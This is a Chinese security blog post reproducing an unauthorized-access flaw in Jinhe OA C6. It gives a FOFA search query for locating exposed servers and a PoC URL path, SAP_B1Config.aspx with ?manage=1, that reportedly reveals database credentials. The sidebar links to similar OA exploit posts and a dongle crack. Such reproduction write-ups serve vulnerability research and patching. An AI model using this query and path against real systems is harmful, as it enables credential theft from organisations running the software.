漏洞复现-金和OA SAP_B1Config.aspx未授权访问漏洞

最新推荐文章于 2024-05-31 10:49:06 发布
最新推荐文章于 2024-05-31 10:49:06 发布
阅读量400 收藏 9
点赞数 6
分类专栏: Web 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69010236/article/details/135510985
版权

漏洞描述

金和QA办公系统是.款集合了办公自动化协同办公工作流管理等功能的企业级管理软件。金和OA办公系统提供了多个模块,包括日程管理、文件管理、邮件管理、人事管理、客户管理、项目管理等。用户可以根据自己的需求选择需要的模块进行使用。该系统存在未授权访问漏洞,攻击者可通过此漏洞获取数据库的账户密码等敏感信息。

漏洞复现

第一步、使用下面fofa语句进行资产收集...确认测试目标

资产测绘:app="金和网络-金和OA"

第二步、登陆页面如下

 第三步、漏洞利用,使用poc进行拼接URL访问,可查看到泄露的数据库账号跟密码

/C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1

批量检测工具

关注揽月安全团队公众号即可获得

鹤-云
关注
  • 6
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【1day】OA某接口存在授权访问漏洞
记录并分享学习安全的知识点..
12-07 772
软件,旨在提供高效的办公流程管理和协作解决方案。它提供了一系列功能和工具,帮助企业实现办公自动化、信息共享和团队协作。OA存在授权访问漏洞,攻击者可以通过某种方式绕过身份验证机制,直接访问应用程序或系统的敏感资源或功能,从而获取敏感信息或进行恶意操作的一种漏洞OA是一款企业级。
OA C6/Control/GetSqlData.aspx/.ashx SQL 注入漏洞复现
0xSec
12-15 893
OA C6/Control/GetSqlData.aspx/.ashx接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
记一次项目上的漏洞挖掘
Workers77的博客
02-14 3803
接到领导通知,要对某个客户的资产做一次渗透,客户只给了一个C段IP,具体的资产需要自己去收集 通过fofa搜索后,拿到一堆的资产。看了一遍发现客户有个和的OA系统,于是就有了下面的故事 打开后就是个登录界面,因为在前期信息收集的时候也看到这个OA存在一个用户名的注入漏洞(历史漏洞 和协同管理平台SQL注入漏洞(无需登录demo站成功复现) | wooyun-2015-0141624| WooYun.org),这个洞虽然比较老了,但也可以试一下。按照这个保姆级教程抓包测试 结果可想而知 ..
授权访问漏洞原理以及修复方法
it知识分享 free for nothing..
12-20 2801
授权访问漏洞 原理以及修复方法
OA C6 SAP_B1Config.aspx 授权漏洞
Keepb1ue的博客
01-06 2815
和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。
授权访问漏洞测试方法及修复方案
热门推荐
weixin_42728957的博客
04-28 3万+
1、漏洞描述 授权访问漏洞,是在攻击者没有获取到登录权限或授权的情况下,不需要输入密码,即可通过输入网站控制台主页面地址或者不允许查看的连接便可进行访问,同时进行操作。 2、漏洞检测 通过抓包工具(burpsuite、fiddler等),将抓取到的功能链接,在其他浏览器进行打开。 3、修复方案: 加入用户身份认证机制或token验证,对系统的功能点增加权限控制。 <1> 采用Jav...
OA加密狗破解组件
07-13
通过调整程序类库破解OA加密狗通过调整程序类库破解OA加密狗
OA GetSqlData.aspx 远程命令执行漏洞
xiaokp7的博客
09-13 713
OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。OA GetTreeDate存在SQL注入漏洞
OA SAP_B1Config.aspx存在授权访问漏洞
3tefanie丶zhou的博客
01-03 572
【有些话可以不说透,自欺欺人,就可以糊涂一世,打打闹闹轻轻松松。】
OA_C6_用户手册.pdf
03-05
OA_C6_用户手册,比较基本的一个介绍,适合入门级的学习以及人员培训使用。
OA_C6-自定义表单操作手册
09-13
针对OA_C6-自定义表单详细讲解手册
和软件OA浏览器设置.doc
11-17
和软件OA浏览器设置.doc
协同项目管理软件说明--和软件.pptx
07-18
协同项目管理软件说明--和软件.pptx
漏洞复现和C6协同管理平台 授权访问_08
fushuang333的博客
01-04 694
漏洞复现和C6协同管理平台授权访问
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8253
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全行为可控定义以及表现内容简述
行云管家
05-28 339
在数字化快速发展的今天,网络安全已成为国家和企业不可或缺的防线。据统计,网络攻击事件频发,给全球经济带来了巨大损失。因此,确保网络安全行为可控显得尤为重要。今天我们来聊聊网络安全行为可控定义以及表现内容。
网络安全的神秘世界】使用vulhub搭建漏洞测试靶场
最新发布
weixin_54750312的博客
05-31 207
Vulhub是一个基于docker和的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
oa jc6 ntko-upload 任意文件上传漏洞
01-16
OA JC6是一套企业办公协同软件,用于企业内部的办公流程管理与协同办公。而NTKO-Upload是OA JC6中的一个模块,用于用户在办公过程中上传文件进行共享和交流。 然而,OA JC6和NTKO-Upload存在一个任意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值